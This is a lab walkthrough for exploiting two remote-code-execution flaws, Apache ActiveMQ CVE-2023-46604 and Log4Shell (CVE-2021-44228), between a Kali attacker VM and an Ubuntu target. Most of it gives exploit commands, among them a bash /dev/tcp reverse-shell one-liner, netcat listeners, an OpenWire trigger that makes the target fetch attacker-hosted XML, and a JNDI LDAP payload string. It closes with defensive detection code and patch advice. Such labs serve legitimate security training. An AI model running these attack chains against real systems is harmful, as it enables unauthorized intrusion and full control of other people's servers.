This lab walks through exploiting CVE-2023-46604, a deserialization flaw in the OpenWire protocol of Apache ActiveMQ that gives an unauthenticated attacker remote code execution on the broker.
This lab requires the installation of 2 virtual machines: one Kali Linux machine (the attacker) version 2023.4 and one Ubuntu machine (the target) version 22.04.3 LTS. You can download them here:
- Kali Linux 2023.4
- Ubuntu 22.04.3 LTS
- VMware-workstation-17.5.0 for windows
- VMware-workstation-17.5.0 for linux
On Kali Linux machine:
Install git
$sudo apt install git
Install gedit
$sudo apt install gedit
On Ubuntu machine:
Install git
$sudo apt install git
Install openjdk 18
$sudo apt install openjdk-18-jdk
Install the ActiveMQ 5.18.2 package (a release that predates the fix shipped in 5.18.3)
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz
On Ubuntu machine Open a terminal window and run the command as below:
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start
Check the status of the service:
$./activemq status
If the service started successfully, the terminal shows a line similar to "ActiveMQ Broker is running".
You can also visit http://127.0.0.1:8161 on the Ubuntu machine to open the ActiveMQ web console (default credentials admin/admin). It shows the hostname, version, broker ID, uptime and other information. Note that the console is bound to 127.0.0.1 by default, while the OpenWire listener on port 61616 is bound to 0.0.0.0 and requires no credentials, which is what makes the attack below possible from the Kali machine.
On Kali Linux machine
Download resources for the exploiting process:
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls
As you can see, we have 2 files, exploit.py and poc.xml:
- poc.xml is a Spring XML application context. It declares a bean (in the public PoCs for this CVE, a java.lang.ProcessBuilder with init-method="start") whose constructor arguments are the command to run; in the unmodified file that command is gnome-calculator.
- exploit.py does not do any "HTTP encrypting". It opens a TCP connection to the broker's OpenWire port (61616) and sends a crafted ExceptionResponse command whose Throwable class name is org.springframework.context.support.ClassPathXmlApplicationContext and whose message is the URL of poc.xml. The vulnerable marshaller instantiates that class by name without checking that it is a Throwable, Spring fetches poc.xml from our web server over HTTP and instantiates the beans, and the command runs inside the broker's JVM. The broker therefore has to be able to reach our copy of poc.xml, so first open a web server in the resource directory:
$cd CVE-2023-46604
$python3 -m http.server
Open a new terminal window and send the OpenWire trigger to the target's broker with exploit.py (192.168.132.135 is the Ubuntu target, 192.168.132.130 is the Kali machine serving poc.xml on port 8000; substitute your own addresses):
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
After the command is executed, the Calculator application launches on the target machine: the broker fetched poc.xml and ran the command from its own process, which proves the vulnerability has been exploited. We continue by turning this into a reverse shell to control the target machine.
Open a new terminal window to listen for reverse shell connections:
$sudo su
$nc -nlvp 4444
Return to the previous terminal and edit the poc.xml file:
$gedit poc.xml
Replace the value gnome-calculator with bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 and save the file. One check before sending: ProcessBuilder executes its argument list directly, without a shell, and the /dev/tcp redirection is a bash feature. If the file passes gnome-calculator as a single <value> element, split the reverse shell into three values, bash, -c and the one-liner; otherwise the broker will try to execute a program literally named "bash -i >& ..." and nothing will connect back.
Sending malicious code again:
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
The result of this command is a shell on the target machine. It is a root shell only because we started the broker as root (sudo su); on a properly deployed broker the service runs as an unprivileged account and the shell would have that account's rights instead. ROOTED!!!
The second lab walks through exploiting CVE-2021-44228 (Log4Shell) in Apache Log4j 2. It also requires 2 virtual machines: a Kali Linux machine version 2023.4 and an Ubuntu machine version 22.04.3 LTS. You can download them here:
- Kali Linux 2023.4
- Ubuntu 22.04.3 LTS
- VMware-workstation-17.5.0 for windows
- VMware-workstation-17.5.0 for linux
On Kali Linux machine:
Install git
$sudo apt install git
Install gedit
$sudo apt install gedit
On Ubuntu machine:
Install git
$sudo apt install git
Install docker
$sudo apt install docker.io
On Ubuntu machine
Step 1: Download JDK 8 (the jdk-8u20-linux-x64.tar.gz archive is an Oracle JDK 8 build served from a third-party mirror, not OpenJDK)
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz
Step 2: Clone the web server repository and build its Docker image (docker build needs the build context, the directory holding the Dockerfile, as its last argument)
$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
$cd web-server-cve44228
$docker build -t cve44228 .
$docker run --network host cve44228
After completing the above commands, we have a website running on the Ubuntu machine. To browse it, use the URL http://<ubuntu_ip>:8080; in this tutorial that is http://192.168.132.135:8080
On the Kali Linux machine, download the resources needed to exploit the vulnerability
Download the poc and its Python dependencies
$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$cd log4j-shell-poc
$pip install -r requirements.txt
Download JDK 8. poc.py compiles and serves its payload class with the jdk1.8.0_20 directory that it expects to find inside the poc directory, so download and extract the archive there:
$sudo su
$cd log4j-shell-poc
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz   # creates jdk1.8.0_20/ next to poc.py
Open a new terminal to listen for reverse shell connections:
$sudo su
$nc -nlvp 9001
Launch the LDAP and HTTP services with the poc script (--userip is the Kali address the target will call back to, --lport is the port netcat is listening on, and --webport is the port on Kali from which the compiled payload class is served; it does not refer to the target's port 8080)
$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080
The command will return results similar to the following
[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up LDAP server
[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}
[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389
Here we are only interested in the generated jndi value. Open a web browser, go to the website you created earlier and submit ${jndi:ldap://192.168.132.130:1389/a} as the username in the login form. The application logs the username with Log4j, Log4j resolves the lookup, contacts our LDAP server on port 1389, receives a reference to the payload class hosted on port 8080, loads and runs it, and the netcat terminal receives a connection. ROOTED!!! This chain relies on the target JVM being willing to load a class from a remote LDAP codebase; JDK 8u191 and later disable that by default, which is why attacks against newer JVMs used deserialization gadget chains instead. The fix on the defender's side is to upgrade Log4j 2 to 2.17.1 or later (2.12.4 and 2.3.2 on the Java 7 and Java 6 lines); the formatMsgNoLookups flag alone was shown to be an incomplete mitigation.
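Detecting this attack in logs or request captures is harder than grepping for "${jndi:" because Log4j resolves lookups from the inside out, so attackers hide the string inside nested lookups such as ${${lower:j}ndi:...} or ${::-j}${::-n}${::-d}${::-i}:.... The script below is an added example, not code from kozmer/log4j-shell-poc: it re-implements only the slice of Log4j 2 lookup syntax that matters for obfuscation (${lower:x}, ${upper:x} and the default-value form ${anything:-x}), reduces every other lookup to its bare body, and flags lines whose normalized form contains a JNDI lookup. The SAMPLE_LOG lines are constructed to mirror the lab's payload; the function and constant names are this example's own.

```python
"""Detect Log4Shell lookup strings in untrusted input, including the nested
lookup obfuscations used to evade naive "${jndi:" matching.

Added example, not code from kozmer/log4j-shell-poc. It re-implements only
the slice of Log4j 2 lookup syntax that matters for obfuscation: ${lower:x},
${upper:x} and the default-value form ${anything:-x}; every other lookup is
reduced to its body so that a buried "jndi:" surfaces.
"""
import re
from typing import List, Tuple

# Innermost ${...}: a body containing no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# jndi: followed by a scheme (ldap, ldaps, rmi, dns, ...).
_JNDI = re.compile(r"jndi:\s*[a-z]+:", re.IGNORECASE)
MAX_ROUNDS = 64  # bound the work on adversarial input


def _resolve(body: str) -> str:
    """Resolve one innermost lookup body the way an attacker relies on."""
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                 # ${env:NOPE:-j}, ${::-j}: unknown key, default wins
        return body.split(":-", 1)[1]
    return body                      # leave unknown lookups as their bare body


def normalize(text: str) -> str:
    """Collapse nested lookups from the inside out until none remain."""
    for _ in range(MAX_ROUNDS):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(text: str) -> bool:
    """True if the input, once de-obfuscated, carries a JNDI lookup."""
    return _JNDI.search(normalize(text)) is not None


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, normalized form) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed access-log lines (not real captures) mirroring the lab's payload.
SAMPLE_LOG = [
    'POST /login username=alice',
    'POST /login username=${jndi:ldap://192.168.132.130:1389/a}',
    'GET / User-Agent=${${lower:j}ndi:${lower:l}dap://192.168.132.130:1389/a}',
    'GET / X-Api-Version=${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://192.168.132.130:1099/a}',
    'GET /health ${date:yyyy}',
]

if __name__ == "__main__":
    for n, norm in scan_lines(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

Lines 2, 3 and 4 of the sample are reported with their de-obfuscated payload; the benign login and the harmless ${date:yyyy} lookup are not. Unknown lookups are deliberately reduced to their body rather than dropped, so a payload that wraps jndi: in a lookup this code does not know still surfaces.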
For support, email dcm240602@gmail.com